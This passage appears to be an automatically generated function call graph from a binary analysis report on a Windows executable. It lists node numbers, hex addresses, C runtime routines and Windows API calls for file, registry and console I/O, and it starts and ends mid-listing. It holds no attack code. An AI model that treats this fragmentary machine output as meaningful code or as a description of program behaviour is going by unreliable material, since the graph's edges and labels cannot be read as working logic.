100545->100546 100547 bc8c42 100546->100547 100548 b8594c __crtLCMapStringA_stat 58 API calls 100547->100548 100549 bc8c56 100548->100549 100550 b8594c __crtLCMapStringA_stat 58 API calls 100549->100550 100551 bc8c6a 100550->100551 100552 bc8f97 58 API calls 100551->100552 100553 bc8c7d 100551->100553 100552->100553 100553->100528 100553->100530 100561 bc8eca 100554->100561 100555 bc8f82 100587 bc91bf 100555->100587 100556 bc8c8f 74 API calls 100556->100561 100558 bc8e8c 100562 bc8f97 100558->100562 100561->100555 100561->100556 100561->100558 100583 bc909c 100561->100583 100591 bc8d2b 74 API calls 100561->100591 100563 bc8fa4 100562->100563 100565 bc8faa 100562->100565 100564 b82f95 _free 58 API calls 100563->100564 100564->100565 100566 b82f95 _free 58 API calls 100565->100566 100568 bc8fbb 100565->100568 100566->100568 100567 bc8e93 100567->100538 100570 b855d6 100567->100570 100568->100567 100569 b82f95 _free 58 API calls 100568->100569 100569->100567 100571 b855e2 _flsall 100570->100571 100572 b8560e 100571->100572 100573 b855f6 100571->100573 100575 b86e4e __lock_file 59 API calls 100572->100575 100580 b85606 _flsall 100572->100580 100640 b88d68 58 API calls __getptd_noexit 100573->100640 100577 b85620 100575->100577 100576 b855fb 100641 b88ff6 9 API calls __filbuf 100576->100641 100624 b8556a 100577->100624 100580->100538 100584 bc90eb 100583->100584 100585 bc90ab 100583->100585 100584->100585 100592 bc9172 100584->100592 100585->100561 100588 bc91cc 100587->100588 100589 bc91dd 100587->100589 100590 b84a93 80 API calls 100588->100590 100589->100558 100590->100589 100591->100561 100593 bc919e 100592->100593 100594 bc91af 100592->100594 100596 b84a93 100593->100596 100594->100584 100597 b84a9f _flsall 100596->100597 100598 b84abd 100597->100598 100599 b84ad5 100597->100599 100600 b84acd _flsall 100597->100600 100621 b88d68 58 API calls __getptd_noexit 100598->100621 100601 b86e4e __lock_file 59 API calls 100599->100601 100600->100594 100603 b84adb 100601->100603 100609 b8493a 100603->100609 100604 b84ac2 100622 b88ff6 9 API calls __filbuf 100604->100622 100612 b84949 100609->100612 100615 b84967 100609->100615 100610 b84957 100611 b88d68 __filbuf 58 API calls 100610->100611 100613 b8495c 100611->100613 100612->100610 100612->100615 100619 b84981 _memmove 100612->100619 100614 b88ff6 __filbuf 9 API calls 100613->100614 100614->100615 100623 b84b0d LeaveCriticalSection LeaveCriticalSection _fprintf 100615->100623 100616 b8b05e __flsbuf 78 API calls 100616->100619 100617 b84c6d __flush 78 API calls 100617->100619 100618 b84916 __filbuf 58 API calls 100618->100619 100619->100615 100619->100616 100619->100617 100619->100618 100620 b8dac6 __write 78 API calls 100619->100620 100620->100619 100621->100604 100622->100600 100623->100600 100625 b85579 100624->100625 100626 b8558d 100624->100626 100679 b88d68 58 API calls __getptd_noexit 100625->100679 100627 b85589 100626->100627 100643 b84c6d 100626->100643 100642 b85645 LeaveCriticalSection LeaveCriticalSection _fprintf 100627->100642 100630 b8557e 100680 b88ff6 9 API calls __filbuf 100630->100680 100635 b84916 __filbuf 58 API calls 100636 b855a7 100635->100636 100653 b90c52 100636->100653 100638 b855ad 100638->100627 100639 b82f95 _free 58 API calls 100638->100639 100639->100627 100640->100576 100641->100580 100642->100580 100644 b84c80 100643->100644 100648 b84ca4 100643->100648 100645 b84916 __filbuf 58 API calls 100644->100645 100644->100648 100646 b84c9d 100645->100646 100681 b8dac6 100646->100681 100649 b90dc7 100648->100649 100650 b855a1 100649->100650 100651 b90dd4 100649->100651 100650->100635 100651->100650 100652 b82f95 _free 58 API calls 100651->100652 100652->100650 100654 b90c5e _flsall 100653->100654 100655 b90c6b 100654->100655 100656 b90c82 100654->100656 100806 b88d34 58 API calls __getptd_noexit 100655->100806 100657 b90d0d 100656->100657 100659 b90c92 100656->100659 100811 b88d34 58 API calls __getptd_noexit 100657->100811 100662 b90cba 100659->100662 100663 b90cb0 100659->100663 100661 b90c70 100807 b88d68 58 API calls __getptd_noexit 100661->100807 100667 b8d446 ___lock_fhandle 59 API calls 100662->100667 100808 b88d34 58 API calls __getptd_noexit 100663->100808 100664 b90cb5 100812 b88d68 58 API calls __getptd_noexit 100664->100812 100669 b90cc0 100667->100669 100671 b90cde 100669->100671 100672 b90cd3 100669->100672 100670 b90d19 100813 b88ff6 9 API calls __filbuf 100670->100813 100809 b88d68 58 API calls __getptd_noexit 100671->100809 100791 b90d2d 100672->100791 100675 b90c77 _flsall 100675->100638 100677 b90cd9 100810 b90d05 LeaveCriticalSection __unlock_fhandle 100677->100810 100679->100630 100680->100627 100682 b8dad2 _flsall 100681->100682 100683 b8dadf 100682->100683 100684 b8daf6 100682->100684 100782 b88d34 58 API calls __getptd_noexit 100683->100782 100686 b8db95 100684->100686 100688 b8db0a 100684->100688 100788 b88d34 58 API calls __getptd_noexit 100686->100788 100687 b8dae4 100783 b88d68 58 API calls __getptd_noexit 100687->100783 100691 b8db28 100688->100691 100692 b8db32 100688->100692 100784 b88d34 58 API calls __getptd_noexit 100691->100784 100709 b8d446 100692->100709 100693 b8db2d 100789 b88d68 58 API calls __getptd_noexit 100693->100789 100696 b8db38 100698 b8db4b 100696->100698 100699 b8db5e 100696->100699 100718 b8dbb5 100698->100718 100785 b88d68 58 API calls __getptd_noexit 100699->100785 100700 b8dba1 100790 b88ff6 9 API calls __filbuf 100700->100790 100704 b8daeb _flsall 100704->100648 100705 b8db57 100787 b8db8d LeaveCriticalSection __unlock_fhandle 100705->100787 100706 b8db63 100786 b88d34 58 API calls __getptd_noexit 100706->100786 100710 b8d452 _flsall 100709->100710 100711 b8d4a1 EnterCriticalSection 100710->100711 100712 b89e4b __lock 58 API calls 100710->100712 100713 b8d4c7 _flsall 100711->100713 100714 b8d477 100712->100714 100713->100696 100715 b8d48f 100714->100715 100716 b8a06b __mtinitlocks InitializeCriticalSectionAndSpinCount 100714->100716 100717 b8d4cb ___lock_fhandle LeaveCriticalSection 100715->100717 100716->100715 100717->100711 100719 b8dbc2 __write_nolock 100718->100719 100720 b8dc20 100719->100720 100721 b8dc01 100719->100721 100749 b8dbf6 100719->100749 100725 b8dc78 100720->100725 100726 b8dc5c 100720->100726 100723 b88d34 __chsize_nolock 58 API calls 100721->100723 100722 b8c836 __ld12tod 6 API calls 100727 b8e416 100722->100727 100724 b8dc06 100723->100724 100728 b88d68 __filbuf 58 API calls 100724->100728 100729 b8dc91 100725->100729 100732 b91b11 __lseeki64_nolock 60 API calls 100725->100732 100730 b88d34 __chsize_nolock 58 API calls 100726->100730 100727->100705 100731 b8dc0d 100728->100731 100733 b95ebb __flswbuf 58 API calls 100729->100733 100734 b8dc61 100730->100734 100735 b88ff6 __filbuf 9 API calls 100731->100735 100732->100729 100736 b8dc9f 100733->100736 100737 b88d68 __filbuf 58 API calls 100734->100737 100735->100749 100738 b8dff8 100736->100738 100743 b89bec __setmbcp 58 API calls 100736->100743 100739 b8dc68 100737->100739 100740 b8e38b WriteFile 100738->100740 100741 b8e016 100738->100741 100742 b88ff6 __filbuf 9 API calls 100739->100742 100744 b8dfeb GetLastError 100740->100744 100751 b8dfb8 100740->100751 100745 b8e13a 100741->100745 100754 b8e02c 100741->100754 100742->100749 100746 b8dccb GetConsoleMode 100743->100746 100744->100751 100755 b8e145 100745->100755 100759 b8e22f 100745->100759 100746->100738 100748 b8dd0a 100746->100748 100747 b8e3c4 100747->100749 100750 b88d68 __filbuf 58 API calls 100747->100750 100748->100738 100752 b8dd1a GetConsoleCP 100748->100752 100749->100722 100757 b8e3f2 100750->100757 100751->100747 100751->100749 100758 b8e118 100751->100758 100752->100747 100768 b8dd49 100752->100768 100753 b8e09b WriteFile 100753->100744 100756 b8e0d8 100753->100756 100754->100747 100754->100753 100755->100747 100760 b8e1aa WriteFile 100755->100760 100756->100754 100776 b8e0fc 100756->100776 100761 b88d34 __chsize_nolock 58 API calls 100757->100761 100762 b8e3bb 100758->100762 100763 b8e123 100758->100763 100759->100747 100764 b8e2a4 WideCharToMultiByte 100759->100764 100760->100744 100765 b8e1f9 100760->100765 100761->100749 100767 b88d47 __dosmaperr 58 API calls 100762->100767 100766 b88d68 __filbuf 58 API calls 100763->100766 100764->100744 100774 b8e2eb 100764->100774 100765->100751 100765->100755 100765->100776 100770 b8e128 100766->100770 100767->100749 100768->100751 100771 b83835 __write_nolock 58 API calls 100768->100771 100777 b9650a 60 API calls __write_nolock 100768->100777 100778 b8de32 WideCharToMultiByte 100768->100778 100781 b8de9f 100768->100781 100769 b8e2f3 WriteFile 100772 b8e346 GetLastError 100769->100772 100769->100774 100773 b88d34 __chsize_nolock 58 API calls 100770->100773 100771->100768 100772->100774 100773->100749 100774->100751 100774->100759 100774->100769 100774->100776 100775 b97cae WriteConsoleW CreateFileW __putwch_nolock 100775->100781 100776->100751 100777->100768 100778->100751 100779 b8de6d WriteFile 100778->100779 100779->100744 100779->100781 100780 b8dec7 WriteFile 100780->100744 100780->100781 100781->100744 100781->100751 100781->100768 100781->100775 100781->100780 100782->100687 100783->100704 100784->100693 100785->100706 100786->100705 100787->100704 100788->100693 100789->100700 100790->100704 100814 b8d703 100791->100814 100793 b90d91 100827 b8d67d 59 API calls 2 library calls 100793->100827 100794 b90d3b 100794->100793 100795 b90d6f 100794->100795 100797 b8d703 __chsize_nolock 58 API calls 100794->100797 100795->100793 100798 b8d703 __chsize_nolock 58 API calls 100795->100798 100800 b90d66 100797->100800 100801 b90d7b FindCloseChangeNotification 100798->100801 100799 b90d99 100802 b90dbb 100799->100802 100828 b88d47 58 API calls 3 library calls 100799->100828 100804 b8d703 __chsize_nolock 58 API calls 100800->100804 100801->100793 100805 b90d87 GetLastError 100801->100805 100802->100677 100804->100795 100805->100793 100806->100661 100807->100675 100808->100664 100809->100677 100810->100675 100811->100664 100812->100670 100813->100675 100815 b8d70e 100814->100815 100818 b8d723 100814->100818 100816 b88d34 __chsize_nolock 58 API calls 100815->100816 100817 b8d713 100816->100817 100820 b88d68 __filbuf 58 API calls 100817->100820 100819 b88d34 __chsize_nolock 58 API calls 100818->100819 100821 b8d748 100818->100821 100822 b8d752 100819->100822 100823 b8d71b 100820->100823 100821->100794 100824 b88d68 __filbuf 58 API calls 100822->100824 100823->100794 100825 b8d75a 100824->100825 100826 b88ff6 __filbuf 9 API calls 100825->100826 100826->100823 100827->100799 100828->100802 100891 b91b90 100829->100891 100832 b648f7 100893 b67eec 100832->100893 100833 b648da 100834 b67d2c 59 API calls 100833->100834 100836 b648e6 100834->100836 100837 b67886 59 API calls 100836->100837 100838 b648f2 100837->100838 100839 b809d5 100838->100839 100840 b91b90 __write_nolock 100839->100840 100841 b809e2 GetLongPathNameW 100840->100841 100842 b67d2c 59 API calls 100841->100842 100843 b6741d 100842->100843 100844 b6716b 100843->100844 100845 b677c7 59 API calls 100844->100845 100846 b6717d 100845->100846 100847 b648ae 60 API calls 100846->100847 100848 b67188 100847->100848 100849 b67193 100848->100849 100850 b9ecae 100848->100850 100851 b63f84 59 API calls 100849->100851 100855 b9ecc8 100850->100855 100903 b67a68 61 API calls 100850->100903 100853 b6719f 100851->100853 100897 b634c2 100853->100897 100856 b671b2 Mailbox 100856->99780 100858 b64f3d 136 API calls 100857->100858 100859 b669ef 100858->100859 100860 b9e45a 100859->100860 100861 b64f3d 136 API calls 100859->100861 100862 bc97e5 122 API calls 100860->100862 100863 b66a03 100861->100863 100864 b9e46f 100862->100864 100863->100860 100865 b66a0b 100863->100865 100866 b9e490 100864->100866 100867 b9e473 100864->100867 100869 b66a17 100865->100869 100870 b9e47b 100865->100870 100868 b80ff6 Mailbox 59 API calls 100866->100868 100871 b64faa 84 API calls 100867->100871 100890 b9e4d5 Mailbox 100868->100890 100904 b66bec 100869->100904 100997 bc4534 90 API calls _wprintf 100870->100997 100871->100870 100875 b9e489 100875->100866 100876 b9e689 100877 b82f95 _free 58 API calls 100876->100877 100878 b9e691 100877->100878 100879 b64faa 84 API calls 100878->100879 100884 b9e69a 100879->100884 100883 b82f95 _free 58 API calls 100883->100884 100884->100883 100885 b64faa 84 API calls 100884->100885 101003 bbfcb1 89 API calls 4 library calls 100884->101003 100885->100884 100887 b67f41 59 API calls 100887->100890 100890->100876 100890->100884 100890->100887 100998 bbfc4d 59 API calls 2 library calls 100890->100998 100999 bbfb6e 61 API calls 2 library calls 100890->100999 101000 bc7621 59 API calls Mailbox 100890->101000 101001 b6766f 59 API calls 2 library calls 100890->101001 101002 b674bd 59 API calls Mailbox 100890->101002 100892 b648bb GetFullPathNameW 100891->100892 100892->100832 100892->100833 100894 b67f06 100893->100894 100896 b67ef9 100893->100896 100895 b80ff6 Mailbox 59 API calls 100894->100895 100895->100896 100896->100836 100898 b634f3 _memmove 100897->100898 100899 b634d4 100897->100899 100900 b80ff6 Mailbox 59 API calls 100898->100900 100902 b80ff6 Mailbox 59 API calls 100899->100902 100901 b6350a 100900->100901 100901->100856 100902->100898 100903->100850 100905 b66c15 100904->100905 100906 b9e847 100904->100906 101009 b65906 60 API calls Mailbox 100905->101009 101095 bbfcb1 89 API calls 4 library calls 100906->101095 100909 b66c37 101010 b65956 100909->101010 100910 b9e85a 101096 bbfcb1 89 API calls 4 library calls 100910->101096 100913 b66c54 100915 b677c7 59 API calls 100913->100915 100917 b66c60 100915->100917 100916 b9e876 100945 b66cc1 100916->100945 101023 b80b9b 60 API calls __write_nolock 100917->101023 100919 b9e889 100922 b65dcf CloseHandle 100919->100922 100920 b66ccf 100923 b677c7 59 API calls 100920->100923 100921 b66c6c 100924 b677c7 59 API calls 100921->100924 100925 b9e895 100922->100925 100926 b66cd8 100923->100926 100927 b66c78 100924->100927 100928 b64f3d 136 API calls 100925->100928 100929 b677c7 59 API calls 100926->100929 100930 b648ae 60 API calls 100927->100930 100935 b9e8b1 100928->100935 100931 b66ce1 100929->100931 100932 b66c86 100930->100932 101033 b646f9 100931->101033 101024 b659b0 ReadFile SetFilePointerEx 100932->101024 100934 b9e8da 101097 bbfcb1 89 API calls 4 library calls 100934->101097 100935->100934 100938 bc97e5 122 API calls 100935->100938 100937 b66cb2 101025 b65c4e 100937->101025 100942 b9e8cd 100938->100942 100946 b9e8d5 100942->100946 100947 b9e8f6 100942->100947 100944 b9e8f1 100974 b66e6c Mailbox 100944->100974 100945->100919 100945->100920 100949 b64faa 84 API calls 100946->100949 100950 b64faa 84 API calls 100947->100950 100949->100934 100951 b9e8fb 100950->100951 100952 b80ff6 Mailbox 59 API calls 100951->100952 100959 b9e92f 100952->100959 100956 b63bcd 100956->99639 100956->99648 101098 b6766f 59 API calls 2 library calls 100959->101098 100964 b9eb69 101104 bc7581 59 API calls Mailbox 100964->101104 100968 b9eb8b 101105 bcf835 59 API calls 2 library calls 100968->101105 100971 b9eb98 100972 b82f95 _free 58 API calls 100971->100972 100972->100974 101004 b65934 100974->101004 100987 b67f41 59 API calls 100992 b9e978 Mailbox 100987->100992 100991 b9ebbb 101106 bbfcb1 89 API calls 4 library calls 100991->101106 100992->100964 100992->100987 100992->100991 101099 bbfc4d 59 API calls 2 library calls 100992->101099 101100 bbfb6e 61 API calls 2 library calls 100992->101100 101101 bc7621 59 API calls Mailbox 100992->101101 101102 b6766f 59 API calls 2 library calls 100992->101102 101103 b67373 59 API calls Mailbox 100992->101103 100994 b9ebd4 100995 b82f95 _free 58 API calls 100994->100995 100996 b9ebe7 100995->100996 100996->100974 100997->100875 100998->100890 100999->100890 101000->100890 101001->100890 101002->100890 101003->100884 101005 b65dcf CloseHandle 101004->101005 101006 b6593c Mailbox 101005->101006 101007 b65dcf CloseHandle 101006->101007 101008 b6594b 101007->101008 101008->100956 101009->100909 101011 b65dcf CloseHandle 101010->101011 101012 b65962 101011->101012 101109 b65df9 101012->101109 101014 b65981 101015 b659a4 101014->101015 101117 b65770 101014->101117 101015->100910 101015->100913 101017 b65993 101134 b653db SetFilePointerEx SetFilePointerEx 101017->101134 101019 b6599a 101019->101015 101020 b9e030 101019->101020 101135 bc3696 SetFilePointerEx SetFilePointerEx WriteFile 101020->101135 101022 b9e060 101022->101015 101023->100921 101024->100937 101032 b65c68 101025->101032 101026 b65cef SetFilePointerEx 101148 b65dae SetFilePointerEx 101026->101148 101027 b9e151 101149 b65dae SetFilePointerEx 101027->101149 101030 b65cc3 101030->100945 101031 b9e16b 101032->101026 101032->101027 101032->101030 101034 b677c7 59 API calls 101033->101034 101035 b6470f 101034->101035 101036 b677c7 59 API calls 101035->101036 101037 b64717 101036->101037 101038 b677c7 59 API calls 101037->101038 101039 b6471f 101038->101039 101040 b677c7 59 API calls 101039->101040 101041 b64727 101040->101041 101042 b9d8fb 101041->101042 101043 b6475b 101041->101043 101044 b681a7 59 API calls 101042->101044 101045 b679ab 59 API calls 101043->101045 101046 b9d904 101044->101046 101047 b64769 101045->101047 101048 b67eec 59 API calls 101046->101048 101049 b67e8c 59 API calls 101047->101049 101052 b6479e 101048->101052 101050 b64773 101049->101050 101050->101052 101053 b679ab 59 API calls 101050->101053 101051 b647de 101150 b679ab 101051->101150 101052->101051 101055 b647bd 101052->101055 101065 b9d924 101052->101065 101056 b64794 101053->101056 101059 b67b52 59 API calls 101055->101059 101058 b67e8c 59 API calls 101056->101058 101057 b9d9f4 101061 b67d2c 59 API calls 101057->101061 101058->101052 101062 b647c7 101059->101062 101060 b647ef 101063 b64801 101060->101063 101066 b681a7 59 API calls 101060->101066 101083 b9d9b1 101061->101083 101062->101051 101070 b679ab 59 API calls 101062->101070 101065->101057 101068 b9d9dd 101065->101068 101077 b9d95b 101065->101077 101066->101063 101068->101057 101073 b9d9c8 101068->101073 101070->101051 101076 b67d2c 59 API calls 101073->101076 101074 b9d9b9 101075 b67d2c 59 API calls 101074->101075 101075->101083 101076->101083 101077->101074 101081 b9d9a4 101077->101081 101078 b67b52 59 API calls 101078->101083 101082 b67d2c 59 API calls 101081->101082 101082->101083 101083->101051 101083->101078 101163 b67a84 59 API calls 2 library calls 101083->101163 101095->100910 101096->100916 101097->100944 101098->100992 101099->100992 101100->100992 101101->100992 101102->100992 101103->100992 101104->100968 101105->100971 101106->100994 101110 b65e12 CreateFileW 101109->101110 101111 b9e181 101109->101111 101112 b65e34 101110->101112 101111->101112 101113 b9e187 CreateFileW 101111->101113 101112->101014 101113->101112 101114 b9e1ad 101113->101114 101115 b65c4e 2 API calls 101114->101115 101116 b9e1b8 101115->101116 101116->101112 101118 b9dfce 101117->101118 101119 b6578b 101117->101119 101129 b6581a 101118->101129 101142 b65e3f 101118->101142 101120 b65c4e 2 API calls 101119->101120 101119->101129 101121 b657ad 101120->101121 101123 b6538e 59 API calls 101121->101123 101124 b657b7 101123->101124 101124->101118 101125 b657c4 101124->101125 101126 b80ff6 Mailbox 59 API calls 101125->101126 101127 b657cf 101126->101127 101128 b6538e 59 API calls 101127->101128 101130 b657da 101128->101130 101129->101017 101136 b65d20 101130->101136 101132 b65807 101133 b65c4e 2 API calls 101132->101133 101133->101129 101134->101019 101135->101022 101137 b65d93 101136->101137 101141 b65d2e 101136->101141 101147 b65dae SetFilePointerEx 101137->101147 101138 b65d56 101138->101132 101140 b65d66 ReadFile 101140->101138 101140->101141 101141->101138 101141->101140 101143 b65c4e 2 API calls 101142->101143 101144 b65e60 101143->101144 101145 b65c4e 2 API calls 101144->101145 101146 b65e74 101145->101146 101146->101129 101147->101141 101148->101030 101149->101031 101151 b67a17 101150->101151 101152 b679ba 101150->101152 101153 b67e8c 59 API calls 101151->101153 101152->101151 101154 b679c5 101152->101154 101160 b679e8 _memmove 101153->101160 101155 b679e0 101154->101155 101156 b9ef32 101154->101156 101164 b68087 59 API calls Mailbox 101155->101164 101157 b68189 59 API calls 101156->101157 101159 b9ef3c 101157->101159 101160->101060 101163->101083 101164->101160 101166 b66ef5 101165->101166 101170 b67009 101165->101170 101167 b80ff6 Mailbox 59 API calls 101166->101167 101166->101170 101169 b66f1c 101167->101169 101168 b80ff6 Mailbox 59 API calls 101175 b66f91 101168->101175 101169->101168 101170->99786 101175->101170 101176->99789 101733 b6107d 101738 b671eb 101733->101738 101735 b6108c 101736 b82f80 __cinit 67 API calls 101735->101736 101737 b61096 101736->101737 101739 b671fb __write_nolock 101738->101739 101740 b677c7 59 API calls 101739->101740 101741 b672b1 101740->101741 101742 b64864 61 API calls 101741->101742 101743 b672ba 101742->101743 101769 b8074f 101743->101769 101746 b67e0b 59 API calls 101747 b672d3 101746->101747 101748 b63f84 59 API calls 101747->101748 101749 b672e2 101748->101749 101750 b677c7 59 API calls 101749->101750 101751 b672eb 101750->101751 101752 b67eec 59 API calls 101751->101752 101753 b672f4 RegOpenKeyExW 101752->101753 101754 b9ecda RegQueryValueExW 101753->101754 101758 b67316 Mailbox 101753->101758 101755 b9ed6c RegCloseKey 101754->101755 101756 b9ecf7 101754->101756 101755->101758 101768 b9ed7e _wcscat Mailbox __wsetenvp 101755->101768 101757 b80ff6 Mailbox 59 API calls 101756->101757 101759 b9ed10 101757->101759 101758->101735 101761 b6538e 59 API calls 101759->101761 101760 b67b52 59 API calls 101760->101768 101762 b9ed1b RegQueryValueExW 101761->101762 101763 b9ed38 101762->101763 101765 b9ed52 101762->101765 101764 b67d2c 59 API calls 101763->101764 101764->101765 101765->101755 101766 b67f41 59 API calls 101766->101768 101767 b63f84 59 API calls 101767->101768 101768->101758 101768->101760 101768->101766 101768->101767 101770 b91b90 __write_nolock 101769->101770 101771 b8075c GetFullPathNameW 101770->101771 101772 b8077e 101771->101772 101773 b67d2c 59 API calls 101772->101773 101774 b672c5 101773->101774 101774->101746 101775 b6568a 101782 b65c18 101775->101782 101781 b656ba Mailbox 101783 b80ff6 Mailbox 59 API calls 101782->101783 101784 b65c2b 101783->101784 101785 b80ff6 Mailbox 59 API calls 101784->101785 101786 b6569c 101785->101786 101787 b65632 101786->101787 101801 b65a2f 101787->101801 101789 b65674 101789->101781 101793 b681c1 MultiByteToWideChar 101789->101793 101790 b65d20 2 API calls 101791 b65643 101790->101791 101791->101789 101791->101790 101808 b65bda 101791->101808 101794 b681e7 101793->101794 101795 b6822e 101793->101795 101797 b80ff6 Mailbox 59 API calls 101794->101797 101796 b67eec 59 API calls 101795->101796 101800 b68220 101796->101800 101798 b681fc MultiByteToWideChar 101797->101798 101824 b678ad 101798->101824 101800->101781 101802 b65a40 101801->101802 101803 b9e065 101801->101803 101802->101791 101817 bb6443 59 API calls Mailbox 101803->101817 101805 b9e06f 101806 b80ff6 Mailbox 59 API calls 101805->101806 101807 b9e07b 101806->101807 101809 b65bee 101808->101809 101810 b9e117 101808->101810 101818 b65b19 101809->101818 101823 bb6443 59 API calls Mailbox 101810->101823 101813 b65bfa 101813->101791 101814 b9e122 101815 b80ff6 Mailbox 59 API calls 101814->101815 101816 b9e137 _memmove 101815->101816 101817->101805 101819 b65b31 101818->101819 101821 b65b2a _memmove 101818->101821 101820 b80ff6 Mailbox 59 API calls 101819->101820 101822 b9e0a7 101819->101822 101820->101821 101821->101813 101822->101822 101823->101814 101825 b6792f 101824->101825 101826 b678bc 101824->101826 101827 b67e8c 59 API calls 101825->101827 101826->101825 101828 b678c8 101826->101828 101834 b678da _memmove 101827->101834 101829 b678d2 101828->101829 101830 b67900 101828->101830 101836 b68087 59 API calls Mailbox 101829->101836 101831 b68189 59 API calls 101830->101831 101833 b6790a 101831->101833 101835 b80ff6 Mailbox 59 API calls 101833->101835 101834->101800 101835->101834 101836->101834 101837 ba0226 101843 b6ade2 Mailbox 101837->101843 101839 ba0c86 101953 bb66f4 101839->101953 101841 ba0c8f 101843->101839 101843->101841 101844 ba00e0 VariantClear 101843->101844 101845 b6b6c1 101843->101845 101851 bd474d 101843->101851 101860 bcd2e6 101843->101860 101907 bde237 101843->101907 101910 b72123 101843->101910 101950 b69df0 59 API calls Mailbox 101843->101950 101951 bb7405 59 API calls 101843->101951 101844->101843 101952 bca0b5 89 API calls 4 library calls 101845->101952 101852 b69997 84 API calls 101851->101852 101853 bd4787 101852->101853 101854 b663a0 94 API calls 101853->101854 101855 bd4797 101854->101855 101856 bd47bc 101855->101856 101857 b6a000 341 API calls 101855->101857 101859 bd47c0 101856->101859 101956 b69bf8 101856->101956 101857->101856 101859->101843 101861 bcd305 101860->101861 101862 bcd310 101860->101862 101969 b69c9c 59 API calls 101861->101969 101865 b677c7 59 API calls 101862->101865 101903 bcd3ea Mailbox 101862->101903 101864 b80ff6 Mailbox 59 API calls 101866 bcd433 101864->101866 101867 bcd334 101865->101867 101868 bcd43f 101866->101868 101972 b65906 60 API calls Mailbox 101866->101972 101870 b677c7 59 API calls 101867->101870 101871 b69997 84 API calls 101868->101871 101872 bcd33d 101870->101872 101873 bcd457 101871->101873 101874 b69997 84 API calls 101872->101874 101875 b65956 67 API calls 101873->101875 101876 bcd349 101874->101876 101877 bcd466 101875->101877 101878 b646f9 59 API calls 101876->101878 101879 bcd49e 101877->101879 101880 bcd46a GetLastError 101877->101880 101881 bcd35e 101878->101881 101884 bcd4c9 101879->101884 101885 bcd500 101879->101885 101882 bcd483 101880->101882 101883 b67c8e 59 API calls 101881->101883 101904 bcd3f3 Mailbox 101882->101904 101973 b65a1a CloseHandle 101882->101973 101886 bcd391 101883->101886 101888 b80ff6 Mailbox 59 API calls 101884->101888 101887 b80ff6 Mailbox 59 API calls 101885->101887 101889 bcd3e3 101886->101889 101894 bc3e73 3 API calls 101886->101894 101890 bcd505 101887->101890 101891 bcd4ce 101888->101891 101971 b69c9c 59 API calls 101889->101971 101898 b677c7 59 API calls 101890->101898 101890->101904 101895 bcd4df 101891->101895 101899 b677c7 59 API calls 101891->101899 101896 bcd3a1 101894->101896 101974 bcf835 59 API calls 2 library calls 101895->101974 101896->101889 101897 bcd3a5 101896->101897 101900 b67f41 59 API calls 101897->101900 101898->101904 101899->101895 101902 bcd3b2 101900->101902 101970 bc3c66 63 API calls Mailbox 101902->101970 101903->101864 101903->101904 101904->101843 101906 bcd3bb Mailbox 101906->101889 101908 bdcdf1 130 API calls 101907->101908 101909 bde247 101908->101909 101909->101843 101911 b69bf8 59 API calls 101910->101911 101912 b7213b 101911->101912 101913 b80ff6 Mailbox 59 API calls 101912->101913 101917 ba69af 101912->101917 101915 b72154 101913->101915 101916 b72164 101915->101916 101990 b65906 60 API calls Mailbox 101915->101990 101920 b69997 84 API calls 101916->101920 101918 b72189 101917->101918 101994 bcf7df 59 API calls 101917->101994 101925 b72196 101918->101925 101995 b69c9c 59 API calls 101918->101995 101922 b72172 101920->101922 101924 b65956 67 API calls 101922->101924 101923 ba69f7 101923->101925 101926 ba69ff 101923->101926 101927 b72181 101924->101927 101929 b65e3f 2 API calls 101925->101929 101996 b69c9c 59 API calls 101926->101996 101927->101917 101927->101918 101993 b65a1a CloseHandle 101927->101993 101931 b7219d 101929->101931 101932 b721b7 101931->101932 101933 ba6a11 101931->101933 101934 b677c7 59 API calls 101932->101934 101935 b80ff6 Mailbox 59 API calls 101933->101935 101936 b721bf 101934->101936 101937 ba6a17 101935->101937 101975 b656d2 101936->101975 101939 ba6a2b 101937->101939 101997 b659b0 ReadFile SetFilePointerEx 101937->101997 101944 ba6a2f _memmove 101939->101944 101998 bc794e 59 API calls 2 library calls 101939->101998 101941 b721ce 101941->101944 101991 b69b9c 59 API calls Mailbox 101941->101991 101945 b721e2 Mailbox 101946 b7221c 101945->101946 101947 b65dcf CloseHandle 101945->101947 101946->101843 101948 b72210 101947->101948 101948->101946 101992 b65a1a CloseHandle 101948->101992 101950->101843 101951->101843 101952->101839 102002 bb6636 101953->102002 101955 bb6702 101955->101841 101957 b9fbff 101956->101957 101958 b69c08 101956->101958 101959 b9fc10 101957->101959 101961 b67d2c 59 API calls 101957->101961 101963 b80ff6 Mailbox 59 API calls 101958->101963 101960 b67eec 59 API calls 101959->101960 101962 b9fc1a 101960->101962 101961->101959 101966 b69c34 101962->101966 101967 b677c7 59 API calls 101962->101967 101964 b69c1b 101963->101964 101964->101962 101965 b69c26 101964->101965 101965->101966 101968 b67f41 59 API calls 101965->101968 101966->101859 101967->101966 101968->101966 101969->101862 101970->101906 101971->101903 101972->101868 101973->101904 101974->101904 101976 b65702 101975->101976 101978 b656dd 101975->101978 101977 b67eec 59 API calls 101976->101977 101982 bc349a 101977->101982 101978->101976 101981 b656ec 101978->101981 101979 bc34c9 101979->101941 101983 b65c18 59 API calls 101981->101983 101982->101979 101999 bc3436 ReadFile SetFilePointerEx 101982->101999 102000 b67a84 59 API calls 2 library calls 101982->102000 101984 bc35ba 101983->101984 101986 b65632 61 API calls 101984->101986 101987 bc35c8 101986->101987 101989 bc35d8 Mailbox 101987->101989 102001 b6793a 61 API calls Mailbox 101987->102001 101989->101941 101990->101916 101991->101945 101992->101946 101993->101917 101994->101917 101995->101923 101996->101931 101997->101939 101998->101944 101999->101982 102000->101982 102001->101989 102003 bb665e 102002->102003 102004 bb6641 102002->102004 102003->101955 102004->102003 102006 bb6621 59 API calls Mailbox 102004->102006 102006->102004 102007 b6e608 102010 b6d260 102007->102010 102009 b6e616 102011 b6d4dd 102010->102011 102012 b6d27d 102010->102012 102024 b6d6ab 102011->102024 102059 bca0b5 89 API calls 4 library calls 102011->102059 102013 ba2b0a 102012->102013 102014 ba2abb 102012->102014 102018 b6d2a4 102012->102018 102054 bda6fb 341 API calls __cinit 102013->102054 102016 ba2abe 102014->102016 102025 ba2ad9 102014->102025 102016->102018 102019 ba2aca 102016->102019 102018->102011 102020 b82f80 __cinit 67 API calls 102018->102020 102018->102024 102029 ba2c26 102018->102029 102033 b68620 69 API calls 102018->102033 102035 b6d594 102018->102035 102041 b6a000 341 API calls 102018->102041 102042 b681a7 59 API calls 102018->102042 102044 b688a0 68 API calls __cinit 102018->102044 102045 b686a2 68 API calls 102018->102045 102047 b6859a 68 API calls 102018->102047 102048 b6d0dc 341 API calls 102018->102048 102049 b69f3a 59 API calls Mailbox 